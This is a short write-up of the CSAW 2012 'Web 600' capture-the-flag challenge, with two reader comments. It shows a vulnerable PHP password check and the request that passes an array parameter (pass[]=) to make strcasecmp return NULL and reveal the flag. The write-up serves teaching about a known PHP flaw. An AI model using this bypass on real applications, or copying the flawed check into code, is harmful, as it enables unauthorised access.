30
Sep
2012

CSAW 2012 – Web 600

No challenge description
http://128.238.66.216/eccbc87e4b5ce2fe28308fd9f2a7baf3/

The website
http://128.238.66.216/eccbc87e4b5ce2fe28308fd9f2a7baf3/

Gives us a directory listing with two files:

[ ]	submit.php	29-Sep-2012 15:54 	224 	 
[ ]	submit.phps	29-Sep-2012 15:56 	224 	 


The source code of the script is shown below.
http://128.238.66.216/eccbc87e4b5ce2fe28308fd9f2a7baf3/submit.phps

<?php
    $key = "key{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}";
    $pass = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
    if ( strcasecmp( $_GET['pass'], $pass ) == 0 ) {
        echo($key);
    }
?>

The attack in this challenge is a trick you need to know, some info can be found on:
http://php.net/manual/en/function.strcmp.php

Requesting http://128.238.66.216/eccbc87e4b5ce2fe28308fd9f2a7baf3/submit.php?pass[]= gives us the following reply:

key{this_is_how_our_scoreboard_was_owned_last_night}

KEY: this_is_how_our_scoreboard_was_owned_last_night

{3 Responses to “CSAW 2012 – Web 600”}

  1. what is the trick i don’t get it….thanks.
    is register_global on, or what?

    an_animal
  2. Yes
    And the php doc say that
    strcmp(“foo”, array()) => NULL + PHP Warning

    don